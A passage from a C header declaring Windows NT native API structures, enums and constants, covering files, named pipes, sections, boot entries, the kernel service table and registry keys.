*PIO_APC_ROUTINE)( _In_ PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved ); #define InitializeObjectAttributes( p, n, a, r, s ) { \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->RootDirectory = r; \ (p)->Attributes = a; \ (p)->ObjectName = n; \ 
(p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ } typedef struct _SYSTEM_VHD_BOOT_INFORMATION { BOOLEAN OsDiskIsVhd; ULONG OsVhdFilePathOffset; WCHAR OsVhdParentVolume[ANYSIZE_ARRAY]; } SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION; typedef struct _SYSTEM_OBJECTTYPE_INFORMATION { ULONG NextEntryOffset; ULONG NumberOfObjects; ULONG NumberOfHandles; ULONG TypeIndex; ULONG InvalidAttributes; GENERIC_MAPPING GenericMapping; ULONG ValidAccessMask; ULONG PoolType; BOOLEAN SecurityRequired; BOOLEAN WaitableObject; UNICODE_STRING TypeName; } SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION; typedef struct _SYSTEM_OBJECT_INFORMATION { ULONG NextEntryOffset; PVOID Object; HANDLE CreatorUniqueProcess; USHORT CreatorBackTraceIndex; USHORT Flags; LONG PointerCount; LONG HandleCount; ULONG PagedPoolCharge; ULONG NonPagedPoolCharge; HANDLE ExclusiveProcessId; PVOID SecurityDescriptor; UNICODE_STRING NameInfo; } SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION; /* ** Boot Entry START */ typedef struct _FILE_PATH { ULONG Version; ULONG Length; ULONG Type; UCHAR FilePath[ANYSIZE_ARRAY]; } FILE_PATH, *PFILE_PATH; typedef struct _BOOT_ENTRY { ULONG Version; ULONG Length; ULONG Id; ULONG Attributes; ULONG FriendlyNameOffset; ULONG BootFilePathOffset; ULONG OsOptionsLength; UCHAR OsOptions[ANYSIZE_ARRAY]; } BOOT_ENTRY, *PBOOT_ENTRY; typedef struct _BOOT_ENTRY_LIST { ULONG NextEntryOffset; BOOT_ENTRY BootEntry; } BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST; /* ** Boot Entry END */ /* ** File start */ #define FILE_SUPERSEDE 0x00000000 #define FILE_OPEN 0x00000001 #define FILE_CREATE 0x00000002 #define FILE_OPEN_IF 0x00000003 #define FILE_OVERWRITE 0x00000004 #define FILE_OVERWRITE_IF 0x00000005 #define FILE_MAXIMUM_DISPOSITION 0x00000005 #define FILE_DIRECTORY_FILE 0x00000001 #define FILE_WRITE_THROUGH 0x00000002 #define FILE_SEQUENTIAL_ONLY 0x00000004 #define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 #define FILE_SYNCHRONOUS_IO_ALERT 
0x00000010 #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 #define FILE_NON_DIRECTORY_FILE 0x00000040 #define FILE_CREATE_TREE_CONNECTION 0x00000080 #define FILE_COMPLETE_IF_OPLOCKED 0x00000100 #define FILE_NO_EA_KNOWLEDGE 0x00000200 #define FILE_OPEN_FOR_RECOVERY 0x00000400 #define FILE_RANDOM_ACCESS 0x00000800 #define FILE_DELETE_ON_CLOSE 0x00001000 #define FILE_OPEN_BY_FILE_ID 0x00002000 #define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 #define FILE_NO_COMPRESSION 0x00008000 #define FILE_RESERVE_OPFILTER 0x00100000 #define FILE_OPEN_REPARSE_POINT 0x00200000 #define FILE_OPEN_NO_RECALL 0x00400000 #define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 #define FILE_COPY_STRUCTURED_STORAGE 0x00000041 #define FILE_STRUCTURED_STORAGE 0x00000441 #define FILE_VALID_OPTION_FLAGS 0x00ffffff #define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032 #define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032 #define FILE_VALID_SET_FLAGS 0x00000036 typedef enum _FILE_INFORMATION_CLASS { FileDirectoryInformation = 1, FileFullDirectoryInformation, FileBothDirectoryInformation, FileBasicInformation, FileStandardInformation, FileInternalInformation, FileEaInformation, FileAccessInformation, FileNameInformation, FileRenameInformation, FileLinkInformation, FileNamesInformation, FileDispositionInformation, FilePositionInformation, FileFullEaInformation, FileModeInformation, FileAlignmentInformation, FileAllInformation, FileAllocationInformation, FileEndOfFileInformation, FileAlternateNameInformation, FileStreamInformation, FilePipeInformation, FilePipeLocalInformation, FilePipeRemoteInformation, FileMailslotQueryInformation, FileMailslotSetInformation, FileCompressionInformation, FileObjectIdInformation, FileCompletionInformation, FileMoveClusterInformation, FileQuotaInformation, FileReparsePointInformation, FileNetworkOpenInformation, FileAttributeTagInformation, FileTrackingInformation, FileIdBothDirectoryInformation, FileIdFullDirectoryInformation, FileValidDataLengthInformation, 
FileShortNameInformation, FileIoCompletionNotificationInformation, FileIoStatusBlockRangeInformation, FileIoPriorityHintInformation, FileSfioReserveInformation, FileSfioVolumeInformation, FileHardLinkInformation, FileProcessIdsUsingFileInformation, FileNormalizedNameInformation, FileNetworkPhysicalNameInformation, FileIdGlobalTxDirectoryInformation, FileIsRemoteDeviceInformation, FileUnusedInformation, FileNumaNodeInformation, FileStandardLinkInformation, FileRemoteProtocolInformation, FileRenameInformationBypassAccessCheck, FileLinkInformationBypassAccessCheck, FileVolumeNameInformation, FileIdInformation, FileIdExtdDirectoryInformation, FileReplaceCompletionInformation, FileHardLinkFullIdInformation, FileIdExtdBothDirectoryInformation, FileDispositionInformationEx, FileRenameInformationEx, FileRenameInformationExBypassAccessCheck, FileDesiredStorageClassInformation, FileStatInformation, FileMemoryPartitionInformation, FileStatLxInformation, FileCaseSensitiveInformation, FileLinkInformationEx, FileLinkInformationExBypassAccessCheck, FileStorageReserveIdInformation, FileCaseSensitiveInformationForceAccessCheck, FileKnownFolderInformation, FileStatBasicInformation, FileId64ExtdDirectoryInformation, FileId64ExtdBothDirectoryInformation, FileIdAllExtdDirectoryInformation, FileIdAllExtdBothDirectoryInformation, FileStreamReservationInformation, FileMaximumInformation } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; typedef enum _FSINFOCLASS { FileFsVolumeInformation = 1, FileFsLabelInformation, FileFsSizeInformation, FileFsDeviceInformation, FileFsAttributeInformation, FileFsControlInformation, FileFsFullSizeInformation, FileFsObjectIdInformation, FileFsDriverPathInformation, FileFsVolumeFlagsInformation, FileFsSectorSizeInformation, FileFsDataCopyInformation, FileFsMetadataSizeInformation, FileFsFullSizeInformationEx, FileFsGuidInformation, FileFsMaximumInformation } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; typedef struct _FILE_BASIC_INFORMATION { 
LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; ULONG FileAttributes; } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; typedef struct _FILE_STANDARD_INFORMATION { LARGE_INTEGER AllocationSize; LARGE_INTEGER EndOfFile; ULONG NumberOfLinks; UCHAR DeletePending; UCHAR Directory; } FILE_STANDARD_INFORMATION; typedef struct _FILE_STANDARD_INFORMATION_EX { LARGE_INTEGER AllocationSize; LARGE_INTEGER EndOfFile; ULONG NumberOfLinks; BOOLEAN DeletePending; BOOLEAN Directory; BOOLEAN AlternateStream; BOOLEAN MetadataAttribute; } FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX; typedef struct _FILE_INTERNAL_INFORMATION { LARGE_INTEGER IndexNumber; } FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; typedef struct _FILE_EA_INFORMATION { ULONG EaSize; } FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; typedef struct _FILE_ACCESS_INFORMATION { ACCESS_MASK AccessFlags; } FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; typedef struct _FILE_POSITION_INFORMATION { LARGE_INTEGER CurrentByteOffset; } FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; typedef struct _FILE_MODE_INFORMATION { ULONG Mode; } FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; typedef struct _FILE_ALIGNMENT_INFORMATION { ULONG AlignmentRequirement; } FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; typedef struct _FILE_NAME_INFORMATION { ULONG FileNameLength; WCHAR FileName[1]; } FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; typedef struct _FILE_ALL_INFORMATION { FILE_BASIC_INFORMATION BasicInformation; FILE_STANDARD_INFORMATION StandardInformation; FILE_INTERNAL_INFORMATION InternalInformation; FILE_EA_INFORMATION EaInformation; FILE_ACCESS_INFORMATION AccessInformation; FILE_POSITION_INFORMATION PositionInformation; FILE_MODE_INFORMATION ModeInformation; FILE_ALIGNMENT_INFORMATION AlignmentInformation; FILE_NAME_INFORMATION NameInformation; } FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; typedef struct 
_FILE_NETWORK_OPEN_INFORMATION { LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER AllocationSize; LARGE_INTEGER EndOfFile; ULONG FileAttributes; } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { ULONG FileAttributes; ULONG ReparseTag; } FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; typedef struct _FILE_ALLOCATION_INFORMATION { LARGE_INTEGER AllocationSize; } FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; typedef struct _FILE_COMPRESSION_INFORMATION { LARGE_INTEGER CompressedFileSize; USHORT CompressionFormat; UCHAR CompressionUnitShift; UCHAR ChunkShift; UCHAR ClusterShift; UCHAR Reserved[3]; } FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; typedef struct _FILE_DISPOSITION_INFORMATION { BOOLEAN DeleteFile; } FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; typedef struct _FILE_END_OF_FILE_INFORMATION { LARGE_INTEGER EndOfFile; } FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { LARGE_INTEGER ValidDataLength; } FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; typedef struct _FILE_LINK_INFORMATION { BOOLEAN ReplaceIfExists; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; typedef struct _FILE_MOVE_CLUSTER_INFORMATION { ULONG ClusterCount; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; typedef struct _FILE_RENAME_INFORMATION { BOOLEAN ReplaceIfExists; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; typedef struct _FILE_STREAM_INFORMATION { ULONG NextEntryOffset; ULONG StreamNameLength; LARGE_INTEGER StreamSize; LARGE_INTEGER StreamAllocationSize; WCHAR StreamName[1]; } 
FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; typedef struct _FILE_TRACKING_INFORMATION { HANDLE DestinationFile; ULONG ObjectInformationLength; CHAR ObjectInformation[1]; } FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; typedef struct _FILE_COMPLETION_INFORMATION { HANDLE Port; PVOID Key; } FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; // // Define the NamedPipeType flags for NtCreateNamedPipeFile // #define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000 #define FILE_PIPE_MESSAGE_TYPE 0x00000001 // // Define the CompletionMode flags for NtCreateNamedPipeFile // #define FILE_PIPE_QUEUE_OPERATION 0x00000000 #define FILE_PIPE_COMPLETE_OPERATION 0x00000001 // // Define the ReadMode flags for NtCreateNamedPipeFile // #define FILE_PIPE_BYTE_STREAM_MODE 0x00000000 #define FILE_PIPE_MESSAGE_MODE 0x00000001 // // Define the NamedPipeConfiguration flags for NtQueryInformation // #define FILE_PIPE_INBOUND 0x00000000 #define FILE_PIPE_OUTBOUND 0x00000001 #define FILE_PIPE_FULL_DUPLEX 0x00000002 // // Define the NamedPipeState flags for NtQueryInformation // #define FILE_PIPE_DISCONNECTED_STATE 0x00000001 #define FILE_PIPE_LISTENING_STATE 0x00000002 #define FILE_PIPE_CONNECTED_STATE 0x00000003 #define FILE_PIPE_CLOSING_STATE 0x00000004 // // Define the NamedPipeEnd flags for NtQueryInformation // #define FILE_PIPE_CLIENT_END 0x00000000 #define FILE_PIPE_SERVER_END 0x00000001 typedef struct _FILE_PIPE_INFORMATION { ULONG ReadMode; ULONG CompletionMode; } FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; typedef struct _FILE_PIPE_LOCAL_INFORMATION { ULONG NamedPipeType; ULONG NamedPipeConfiguration; ULONG MaximumInstances; ULONG CurrentInstances; ULONG InboundQuota; ULONG ReadDataAvailable; ULONG OutboundQuota; ULONG WriteQuotaAvailable; ULONG NamedPipeState; ULONG NamedPipeEnd; } FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; typedef struct _FILE_PIPE_REMOTE_INFORMATION { LARGE_INTEGER CollectDataTime; ULONG MaximumCollectionCount; } 
FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { ULONG MaximumMessageSize; ULONG MailslotQuota; ULONG NextMessageSize; ULONG MessagesAvailable; LARGE_INTEGER ReadTimeout; } FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; typedef struct _FILE_MAILSLOT_SET_INFORMATION { PLARGE_INTEGER ReadTimeout; } FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; typedef struct _FILE_REPARSE_POINT_INFORMATION { LONGLONG FileReference; ULONG Tag; } FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; typedef struct _FILE_LINK_ENTRY_INFORMATION { ULONG NextEntryOffset; LONGLONG ParentFileId; ULONG FileNameLength; WCHAR FileName[1]; } FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION; typedef struct _FILE_LINKS_INFORMATION { ULONG BytesNeeded; ULONG EntriesReturned; FILE_LINK_ENTRY_INFORMATION Entry; } FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION; typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION { ULONG FileNameLength; WCHAR FileName[1]; } FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION; typedef struct _FILE_STANDARD_LINK_INFORMATION { ULONG NumberOfAccessibleLinks; ULONG TotalNumberOfLinks; BOOLEAN DeletePending; BOOLEAN Directory; } FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION; typedef struct _FILE_SFIO_RESERVE_INFORMATION { ULONG RequestsPerPeriod; ULONG Period; BOOLEAN RetryFailures; BOOLEAN Discardable; ULONG RequestSize; ULONG NumOutstandingRequests; } FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION; typedef struct _FILE_SFIO_VOLUME_INFORMATION { ULONG MaximumRequestsPerPeriod; ULONG MinimumPeriod; ULONG MinimumTransferSize; } FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION; // // Define the flags for NtSet(Query)EaFile service structure entries // #define FILE_NEED_EA 0x00000080 // // Define EA type values // #define FILE_EA_TYPE_BINARY 0xfffe #define FILE_EA_TYPE_ASCII 
0xfffd #define FILE_EA_TYPE_BITMAP 0xfffb #define FILE_EA_TYPE_METAFILE 0xfffa #define FILE_EA_TYPE_ICON 0xfff9 #define FILE_EA_TYPE_EA 0xffee #define FILE_EA_TYPE_MVMT 0xffdf #define FILE_EA_TYPE_MVST 0xffde #define FILE_EA_TYPE_ASN1 0xffdd #define FILE_EA_TYPE_FAMILY_IDS 0xff01 typedef struct _FILE_FULL_EA_INFORMATION { ULONG NextEntryOffset; UCHAR Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[1]; } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; typedef struct _FILE_GET_EA_INFORMATION { ULONG NextEntryOffset; UCHAR EaNameLength; CHAR EaName[1]; } FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; typedef struct _FILE_GET_QUOTA_INFORMATION { ULONG NextEntryOffset; ULONG SidLength; SID Sid; } FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; typedef struct _FILE_QUOTA_INFORMATION { ULONG NextEntryOffset; ULONG SidLength; LARGE_INTEGER ChangeTime; LARGE_INTEGER QuotaUsed; LARGE_INTEGER QuotaThreshold; LARGE_INTEGER QuotaLimit; SID Sid; } FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; typedef struct _FILE_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; WCHAR FileName[1]; } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; typedef struct _FILE_FULL_DIR_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; WCHAR FileName[1]; } FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; typedef struct _FILE_ID_FULL_DIR_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; 
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    ULONG EaSize;
    LARGE_INTEGER FileId;
    WCHAR FileName[1];
} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;

typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    ULONG EaSize;
    CCHAR ShortNameLength;
    WCHAR ShortName[12];
    WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;

typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    ULONG EaSize;
    CCHAR ShortNameLength;
    WCHAR ShortName[12];
    LARGE_INTEGER FileId;
    WCHAR FileName[1];
} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;

typedef struct _FILE_NAMES_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    ULONG FileNameLength;
    WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;

typedef struct _FILE_OBJECTID_INFORMATION {
    LONGLONG FileReference;
    UCHAR ObjectId[16];
    union {
        struct {
            UCHAR BirthVolumeId[16];
            UCHAR BirthObjectId[16];
            UCHAR DomainId[16];
        };
        UCHAR ExtendedInfo[48];
    };
} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;

typedef struct _FILE_FS_VOLUME_INFORMATION {
    LARGE_INTEGER VolumeCreationTime;
    ULONG VolumeSerialNumber;
    ULONG VolumeLabelLength;
    BOOLEAN SupportsObjects;
    WCHAR VolumeLabel[1];
} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;

typedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    LARGE_INTEGER FileId;
    GUID LockingTransactionId;
    ULONG TxInfoFlags;
    WCHAR FileName[1];
} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION;

/*
** File END
*/

/*
** Section START
*/

typedef enum _SECTION_INFORMATION_CLASS {
    SectionBasicInformation,
    SectionImageInformation,
    SectionRelocationInformation,
    SectionOriginalBaseInformation,
    SectionInternalImageInformation,
    MaxSectionInfoClass
} SECTION_INFORMATION_CLASS;

typedef struct _SECTION_BASIC_INFO {
    PVOID BaseAddress;
    ULONG AllocationAttributes;
    LARGE_INTEGER MaximumSize;
} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

typedef struct _SECTION_IMAGE_INFORMATION {
    PVOID TransferAddress;
    ULONG ZeroBits;
    SIZE_T MaximumStackSize;
    SIZE_T CommittedStackSize;
    ULONG SubSystemType;
    union {
        struct {
            USHORT SubSystemMinorVersion;
            USHORT SubSystemMajorVersion;
        };
        ULONG SubSystemVersion;
    };
    union {
        struct {
            USHORT MajorOperatingSystemVersion;
            USHORT MinorOperatingSystemVersion;
        };
        ULONG OperatingSystemVersion;
    };
    USHORT ImageCharacteristics;
    USHORT DllCharacteristics;
    USHORT Machine;
    BOOLEAN ImageContainsCode;
    union {
        UCHAR ImageFlags;
        struct {
            UCHAR ComPlusNativeReady : 1;
            UCHAR ComPlusILOnly : 1;
            UCHAR ImageDynamicallyRelocated : 1;
            UCHAR ImageMappedFlat : 1;
            UCHAR BaseBelow4gb : 1;
            UCHAR ComPlusPrefer32bit : 1;
            UCHAR Reserved : 2;
        };
    };
    ULONG LoaderFlags;
    ULONG ImageFileSize;
    ULONG CheckSum;
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;

typedef struct _MI_EXTRA_IMAGE_INFORMATION {
    ULONG SizeOfHeaders;
    ULONG SizeOfImage;
} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;

typedef struct _MI_SECTION_IMAGE_INFORMATION {
    SECTION_IMAGE_INFORMATION ExportedImageInformation;
    MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;
} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;

typedef struct _SECTION_IMAGE_INFORMATION64 {
    ULONGLONG TransferAddress;
    ULONG ZeroBits;
    ULONGLONG MaximumStackSize;
    ULONGLONG CommittedStackSize;
    ULONG SubSystemType;
    union {
        struct {
            USHORT SubSystemMinorVersion;
            USHORT SubSystemMajorVersion;
        };
        ULONG SubSystemVersion;
    };
    union {
        struct {
            USHORT MajorOperatingSystemVersion;
            USHORT MinorOperatingSystemVersion;
        };
        ULONG OperatingSystemVersion;
    };
    USHORT ImageCharacteristics;
    USHORT DllCharacteristics;
    USHORT Machine;
    BOOLEAN ImageContainsCode;
    union {
        UCHAR ImageFlags;
        struct {
            UCHAR ComPlusNativeReady : 1;
            UCHAR ComPlusILOnly : 1;
            UCHAR ImageDynamicallyRelocated : 1;
            UCHAR ImageMappedFlat : 1;
            UCHAR BaseBelow4gb : 1;
            UCHAR ComPlusPrefer32bit : 1;
            UCHAR Reserved : 2;
        };
    };
    ULONG LoaderFlags;
    ULONG ImageFileSize;
    ULONG CheckSum;
} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;

typedef struct _SECTION_INTERNAL_IMAGE_INFORMATION {
    SECTION_IMAGE_INFORMATION SectionInformation;
    union {
        ULONG ExtendedFlags;
        struct {
            ULONG ImageExportSuppressionEnabled : 1;
            ULONG ImageCetShadowStacksReady : 1; // 20H1
            ULONG ImageXfgEnabled : 1; // 20H2
            ULONG ImageCetShadowStacksStrictMode : 1;
            ULONG ImageCetSetContextIpValidationRelaxedMode : 1;
            ULONG ImageCetDynamicApisAllowInProc : 1;
            ULONG ImageCetDowngradeReserved1 : 1;
            ULONG ImageCetDowngradeReserved2 : 1;
            ULONG Reserved : 24;
        };
    };
} SECTION_INTERNAL_IMAGE_INFORMATION, *PSECTION_INTERNAL_IMAGE_INFORMATION;

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

#ifndef SEC_BASED
#define SEC_BASED 0x200000
#endif
// The guard must name the macro it protects (SEC_NO_CHANGE), not SEC_NO_IMAGE.
#ifndef SEC_NO_CHANGE
#define SEC_NO_CHANGE 0x400000
#endif
#ifndef SEC_FILE
#define SEC_FILE 0x800000
#endif
#ifndef SEC_IMAGE
#define SEC_IMAGE 0x1000000
#endif
#ifndef SEC_RESERVE
#define SEC_RESERVE 0x4000000
#endif
#ifndef SEC_COMMIT
#define SEC_COMMIT 0x8000000
#endif
#ifndef SEC_NOCACHE
#define SEC_NOCACHE 0x10000000
#endif
#ifndef SEC_GLOBAL
#define SEC_GLOBAL 0x20000000
#endif
#ifndef SEC_LARGE_PAGES
#define SEC_LARGE_PAGES 0x80000000
#endif

/*
** Section END
*/

/*
** System Table START
*/

#define NUMBER_SERVICE_TABLES 2
#define NTOS_SERVICE_INDEX 0
#define WIN32K_SERVICE_INDEX 1
#define SERVICE_NUMBER_MASK ((1 << 12) - 1)

#if defined(_WIN64)
#if defined(_AMD64_)
#define SERVICE_TABLE_SHIFT (12 - 4)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
#else
#define SERVICE_TABLE_SHIFT (12 - 5)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)
#endif
#else
#define SERVICE_TABLE_SHIFT (12 - 4)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
#endif

typedef struct _KSERVICE_TABLE_DESCRIPTOR {
    ULONG_PTR Base; // e.g. KiServiceTable
    PULONG Count;
    ULONG Limit; // e.g. KiServiceLimit
    PUCHAR Number; // e.g. KiArgumentTable
} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;

/*
** System Table END
*/

/*
** System Boot Environment START
*/

// Size=20
typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 {
    GUID BootIdentifier;
    FIRMWARE_TYPE FirmwareType;
} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;

// Size=32
typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION {
    GUID BootIdentifier;
    FIRMWARE_TYPE FirmwareType;
    union {
        ULONGLONG BootFlags;
        struct {
            ULONGLONG DbgMenuOsSelection : 1; // RS4
            ULONGLONG DbgHiberBoot : 1;
            ULONGLONG DbgSoftBoot : 1;
            ULONGLONG DbgMeasuredLaunch : 1;
            ULONGLONG DbgMeasuredLaunchCapable : 1; // 19H1
            ULONGLONG DbgSystemHiveReplace : 1;
            ULONGLONG DbgMeasuredLaunchSmmProtections : 1;
            ULONGLONG DbgMeasuredLaunchSmmLevel : 7; // 20H1
        };
    };
} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;

/*
** System Boot Environment END
*/

/*
** Key START
*/

typedef enum _KEY_INFORMATION_CLASS {
    KeyBasicInformation,
    KeyNodeInformation,
    KeyFullInformation,
    KeyNameInformation,
    KeyCachedInformation,
    KeyFlagsInformation,
    KeyVirtualizationInformation,
    KeyHandleTagsInformation,
    KeyTrustInformation,
    KeyLayerInformation,
    MaxKeyInfoClass
} KEY_INFORMATION_CLASS;

typedef enum _KEY_SET_INFORMATION_CLASS {
    KeyWriteTimeInformation,
    KeyWow64FlagsInformation,
    KeyControlFlagsInformation,
    KeySetVirtualizationInformation,
    KeySetDebugInformation,
    KeySetHandleTagsInformation,
    KeySetLayerInformation,
    MaxKeySetInfoClass
} KEY_SET_INFORMATION_CLASS;

typedef struct _KEY_FULL_INFORMATION {
    LARGE_INTEGER LastWriteTime;
    ULONG TitleIndex;
    ULONG ClassOffset;
    ULONG ClassLength;
    ULONG SubKeys;
    ULONG MaxNameLen;
